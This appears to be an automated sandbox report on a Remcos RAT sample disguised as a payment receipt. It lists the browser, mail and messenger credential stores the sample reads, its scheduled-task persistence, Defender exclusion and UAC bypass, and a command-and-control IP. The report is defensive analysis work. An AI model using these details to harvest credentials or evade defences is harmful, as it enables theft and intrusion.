                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 7_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,7_2_10002264
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0041A7B2 GetUserNameW,12_2_0041A7B2
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: 12_2_0044801F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,12_2_0044801F
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: 15_2_0041739B GetVersionExW,15_2_0041739B
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR
                Contains functionality to steal Chrome passwords or cookies
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data12_2_0040B21B
                Contains functionality to steal Firefox passwords or cookies
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\12_2_0040B335
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: \key3.db12_2_0040B335
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Tries to steal Instant Messenger accounts or passwords
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                Tries to steal Mail credentials (via file registry)
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: ESMTPPassword17_2_004033F0
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword17_2_00402DB3
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword17_2_00402DB3
                Yara detected WebBrowserPassView password recovery tool
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 5600, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Detected Remcos RAT
                Source: C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-OPLFYEJump to behavior
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-OPLFYEJump to behavior
                Yara detected Remcos RAT
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 12.2.eaJOpx.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.43e2100.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4ab2700.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.SwiftCopy_PaymtRecpt121228.exe.4369ae0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.eaJOpx.exe.4a3a0e0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000C.00000002.2108090564.0000000000C1A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4508770334.00000000011E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7252, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: SwiftCopy_PaymtRecpt121228.exe PID: 7664, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 7832, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: eaJOpx.exe PID: 8004, type: MEMORYSTR
                Source: C:\Users\user\AppData\Roaming\eaJOpx.exeCode function: cmd.exe12_2_00405042

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                Native API                		1
                DLL Side-Loading                		1
                DLL Side-Loading                		11
                Disable or Modify Tools                		2
                OS Credential Dumping                		2
                System Time Discovery                		Remote Services11
                Archive Collected Data                		12
                Ingress Tool Transfer                		Exfiltration Over Other Network Medium1
                System Shutdown/Reboot
                CredentialsDomainsDefault Accounts12
                Command and Scripting Interpreter                		1
                Windows Service                		1
                Bypass User Account Control                		1
                Deobfuscate/Decode Files or Information                		111
                Input Capture                		1
                Account Discovery                		Remote Desktop Protocol1
                Data from Local System                		2
                Encrypted Channel                		Exfiltration Over Bluetooth1
                Defacement
                Email AddressesDNS ServerDomain Accounts1
                Scheduled Task/Job                		1
                Scheduled Task/Job                		1
                Access Token Manipulation                		4
                Obfuscated Files or Information                		2
                Credentials in Registry                		1
                System Service Discovery                		SMB/Windows Admin Shares1
                Email Collection                		1
                Remote Access Software                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal Accounts2
                Service Execution                		Login Hook1
                Windows Service                		12
                Software Packing                		3
                Credentials In Files                		3
                File and Directory Discovery                		Distributed Component Object Model111
                Input Capture                		2
                Non-Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script222
                Process Injection                		1
                DLL Side-Loading                		LSA Secrets38
                System Information Discovery                		SSH3
                Clipboard Data                		12
                Application Layer Protocol                		Scheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                Scheduled Task/Job                		1
                Bypass User Account Control                		Cached Domain Credentials131
                Security Software Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                Masquerading                		DCSync31
                Virtualization/Sandbox Evasion                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                Virtualization/Sandbox Evasion                		Proc Filesystem4
                Process Discovery                		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                Access Token Manipulation                		/etc/passwd and /etc/shadow1
                Application Window Discovery                		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
                Process Injection                		Network Sniffing1
                System Owner/User Discovery                		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1576839 Sample: SwiftCopy_PaymtRecpt121228.exe Startdate: 17/12/2024 Architecture: WINDOWS Score: 100 51 geoplugin.net 2->51 57 Suricata IDS alerts for network traffic 2->57 59 Found malware configuration 2->59 61 Malicious sample detected (through community Yara rule) 2->61 63 12 other signatures 2->63 8 SwiftCopy_PaymtRecpt121228.exe 7 2->8         started        12 eaJOpx.exe 5 2->12         started        signatures3 process4 file5 43 C:\Users\user\AppData\Roaming\eaJOpx.exe, PE32 8->43 dropped 45 C:\Users\user\...\eaJOpx.exe:Zone.Identifier, ASCII 8->45 dropped 47 C:\Users\user\AppData\Local\...\tmpDCEE.tmp, XML 8->47 dropped 49 C:\...\SwiftCopy_PaymtRecpt121228.exe.log, ASCII 8->49 dropped 65 Tries to steal Mail credentials (via file registry) 8->65 67 Uses schtasks.exe or at.exe to add and modify task schedules 8->67 69 Adds a directory exclusion to Windows Defender 8->69 71 Injects a PE file into a foreign processes 8->71 14 SwiftCopy_PaymtRecpt121228.exe 3 13 8->14         started        18 powershell.exe 20 8->18         started        20 schtasks.exe 1 8->20         started        73 Multi AV Scanner detection for dropped file 12->73 75 Contains functionality to bypass UAC (CMSTPLUA) 12->75 77 Contains functionalty to change the wallpaper 12->77 79 5 other signatures 12->79 22 eaJOpx.exe 12->22         started        24 schtasks.exe 1 12->24         started        signatures6 process7 dnsIp8 53 192.210.150.17, 49706, 49983, 49984 AS-COLOCROSSINGUS United States 14->53 55 geoplugin.net 178.237.33.50, 49708, 80 ATOM86-ASATOM86NL Netherlands 14->55 87 Detected Remcos RAT 14->87 89 Maps a DLL or memory area into another process 14->89 26 SwiftCopy_PaymtRecpt121228.exe 14->26         started        29 SwiftCopy_PaymtRecpt121228.exe 14->29         started        31 SwiftCopy_PaymtRecpt121228.exe 14 14->31         started        33 SwiftCopy_PaymtRecpt121228.exe 14->33         started        91 Loading BitLocker PowerShell Module 18->91 35 WmiPrvSE.exe 18->35         started        37 conhost.exe 18->37         started        39 conhost.exe 20->39         started        41 conhost.exe 24->41         started        signatures9 process10 signatures11 81 Tries to steal Instant Messenger accounts or passwords 26->81 83 Tries to steal Mail credentials (via file / registry access) 26->83 85 Tries to harvest and steal browser information (history, passwords, etc) 29->85

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                SwiftCopy_PaymtRecpt121228.exe34%ReversingLabsWin32.Trojan.Generic
                SwiftCopy_PaymtRecpt121228.exe100%Joe Sandbox ML

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\eaJOpx.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\eaJOpx.exe34%ReversingLabsWin32.Exploit.Generic

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                No Antivirus matches

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                geoplugin.net
                		178.237.33.50
                		truefalse
                  		high

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://geoplugin.net/json.gpfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://www.google.comSwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                      		high
                      http://geoplugin.net/json.gpl$SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://www.imvu.comrSwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                          		high
                          http://geoplugin.net/json.gp/CSwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000003684000.00000004.00000800.00020000.00000000.sdmp, SwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2067092398.0000000004369000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 00000009.00000002.2118589120.0000000004A3A000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 0000000C.00000002.2107350367.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                            		high
                            http://www.imvu.comSwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                              		high
                              https://www.google.com/accounts/serviceloginSwiftCopy_PaymtRecpt121228.exefalse
                                		high
                                https://login.yahoo.com/config/loginSwiftCopy_PaymtRecpt121228.exefalse
                                  		high
                                  http://www.nirsoft.netSwiftCopy_PaymtRecpt121228.exe, 0000000F.00000002.4054409156.0000000000B33000.00000004.00000010.00020000.00000000.sdmpfalse
                                    		high
                                    http://www.nirsoft.net/SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                      		high
                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameSwiftCopy_PaymtRecpt121228.exe, 00000000.00000002.2066490817.0000000002631000.00000004.00000800.00020000.00000000.sdmp, eaJOpx.exe, 00000009.00000002.2116715944.0000000002D01000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comSwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                          		high
                                          http://geoplugin.net/json.gp~SwiftCopy_PaymtRecpt121228.exe, 00000007.00000002.4508933669.000000000121F000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.ebuddy.comSwiftCopy_PaymtRecpt121228.exe, SwiftCopy_PaymtRecpt121228.exe, 00000012.00000002.4043408926.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                                              		high

                                              World Map of Contacted IPs

                                              • No. of IPs < 25%
                                              • 25% < No. of IPs < 50%
                                              • 50% < No. of IPs < 75%
                                              • 75% < No. of IPs

                                              Public IPs

                                              IPDomainCountryFlagASNASN NameMalicious
                                              192.210.150.17
                                              		unknownUnited States
                                              		36352AS-COLOCROSSINGUStrue
                                              178.237.33.50
                                              		geoplugin.netNetherlands
                                              		8455ATOM86-ASATOM86NLfalse

                                              General Information

                                              Joe Sandbox version:41.0.0 Charoite
                                              Analysis ID:1576839
                                              Start date and time:2024-12-17 16:36:08 +01:00
                                              Joe Sandbox product:CloudBasic
                                              Overall analysis duration:0h 10m 35s
                                              Hypervisor based Inspection enabled:false
                                              Report type:full
                                              Cookbook file name:default.jbs
                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                              Number of analysed new started processes analysed:19
                                              Number of new started drivers analysed:0
                                              Number of existing processes analysed:0
                                              Number of existing drivers analysed:0
                                              Number of injected processes analysed:0
                                              Technologies:
                                              • HCA enabled
                                              • EGA enabled
                                              • AMSI enabled
                                              Analysis Mode:default
                                              Analysis stop reason:Timeout
                                              Sample name:SwiftCopy_PaymtRecpt121228.exe
                                              Detection:MAL
                                              Classification:mal100.rans.phis.troj.spyw.expl.evad.winEXE@24/14@1/2
                                              EGA Information:
                                              • Successful, ratio: 100%
                                              HCA Information:
                                              • Successful, ratio: 99%
                                              • Number of executed functions: 245
                                              • Number of non-executed functions: 285
                                              Cookbook Comments:
                                              • Found application associated with file extension: .exe
                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                              Warnings

                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                              • Excluded IPs from analysis (whitelisted): 23.218.208.109, 4.175.87.197, 13.107.246.63
                                              • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                              • Not all processes where analyzed, report is missing behavior information
                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                              • Report size getting too big, too many NtCreateKey calls found.
                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                              • VT rate limit hit for: SwiftCopy_PaymtRecpt121228.exe

                                              Simulations

                                              Behavior and APIs

                                              TimeTypeDescription
                                              10:36:59API Interceptor4457185x Sleep call for process: SwiftCopy_PaymtRecpt121228.exe modified
                                              10:37:02API Interceptor18x Sleep call for process: powershell.exe modified
                                              10:37:05API Interceptor15x Sleep call for process: eaJOpx.exe modified
                                              16:37:04Task SchedulerRun new task: eaJOpx path: C:\Users\user\AppData\Roaming\eaJOpx.exe

                                              Joe Sandbox View / Context

                                              IPs

                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              192.210.150.17SwiftCopy_PaymtRecpt121224.exeGet hashmaliciousRemcosBrowse
                                                NDA_MD580 project.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  178.237.33.50BBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • geoplugin.net/json.gp
                                                  Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • geoplugin.net/json.gp
                                                  Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • geoplugin.net/json.gp
                                                  givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                  • geoplugin.net/json.gp
                                                  Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  • geoplugin.net/json.gp

                                                  Domains

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  geoplugin.netBBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 178.237.33.50
                                                  Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 178.237.33.50
                                                  Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 178.237.33.50
                                                  givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 178.237.33.50
                                                  clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 178.237.33.50
                                                  7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  • 178.237.33.50

                                                  ASNs

                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                  AS-COLOCROSSINGUSDocument.xlaGet hashmaliciousUnknownBrowse
                                                  • 172.245.123.12
                                                  greatnicefeatureswithsupercodebnaturalthingsinlineforgiven.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 23.95.235.29
                                                  sweetnesswithgreatnessiwthbestthingswithmebackickmegreatthings.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 23.95.235.29
                                                  createdbetterthingswithgreatnressgivenmebackwithnice.htaGet hashmaliciousCobalt Strike, FormBookBrowse
                                                  • 172.245.123.12
                                                  ORDER-24171200967.XLS..jsGet hashmaliciousWSHRat, Caesium Obfuscator, STRRATBrowse
                                                  • 192.3.220.6
                                                  newthingswithgreatupdateiongivenbestthingswithme.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 107.173.4.16
                                                  crreatedbestthingswithgreatattitudeneedforthat.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 107.173.4.16
                                                  Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                  • 192.3.179.166
                                                  Smple_Order-048576744759475945.xlsGet hashmaliciousUnknownBrowse
                                                  • 192.3.179.166
                                                  Document.xla.xlsxGet hashmaliciousUnknownBrowse
                                                  • 172.245.123.12
                                                  ATOM86-ASATOM86NLBBVA S.A..vbsGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  Suzhou Alpine Flow Control Co., Ltd. Financial Audit Questionaire 2024.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 178.237.33.50
                                                  Ref GEC409876 CONSTRUCTION OF MAJLIS PROJECT IN SAADIYAT, ABU DHABI.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 178.237.33.50
                                                  Purchase Order Draft for ATPS Inq Ref240912887-ATPS.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                  • 178.237.33.50
                                                  givenbestupdatedoingformebestthingswithgreatnewsformegive.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 178.237.33.50
                                                  clearentirethingwithbestnoticetheeverythinggooodfrome.htaGet hashmaliciousCobalt Strike, RemcosBrowse
                                                  • 178.237.33.50
                                                  7Sbq4gMMlp.exeGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  PO_0099822111ORDER.jsGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  requests-pdf.exeGet hashmaliciousRemcosBrowse
                                                  • 178.237.33.50
                                                  Documents.pdfGet hashmaliciousRemcos, DBatLoaderBrowse
                                                  • 178.237.33.50

                                                  JA3 Fingerprints

                                                  No context

                                                  Dropped Files

                                                  No context

                                                  Created / dropped Files

                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\SwiftCopy_PaymtRecpt121228.exe.log

                                                  Download File
                                                  Process:C:\Users\user\Desktop\SwiftCopy_PaymtRecpt121228.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):1415
                                                  Entropy (8bit):5.352427679901606
                                                  Encrypted:false
                                                  SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                                  MD5:97AD91F1C1F572C945DA12233082171D
                                                  SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                                  SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
